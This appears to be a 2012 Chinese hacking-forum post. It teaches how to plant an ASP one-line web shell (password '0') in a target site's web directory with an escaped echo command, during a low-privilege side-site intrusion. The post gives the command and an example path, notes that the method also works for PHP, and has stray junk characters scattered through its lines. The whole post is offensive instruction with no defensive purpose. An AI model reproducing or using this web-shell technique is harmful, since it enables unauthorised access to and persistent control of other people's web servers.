在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。% G1 d' ]/ B, h2 K! {
! M9 I8 m2 E! e" z0 I2 p9 v
命令格式
( t6 a) H/ |0 n9 L+ n4 b; _0 E
4 r8 h* ^! L4 H [Echo 语句 >目标站绝对目录& R5 Z0 O. t* A' I, W% V" B9 M
1 q7 R+ j C5 B& @0 S
例如:
; k* _' ^. ?& [, @: |. R4 X' [! ^9 l3 R& m o, w! E- y
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp5 D4 k9 Q+ I- a/ [3 y/ O
2 R. @5 N, O( f0 b" K这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
' T' n0 u. u; _9 P. C' q; V |
发表于 2012-9-23 14:40:24
收藏
支持
反对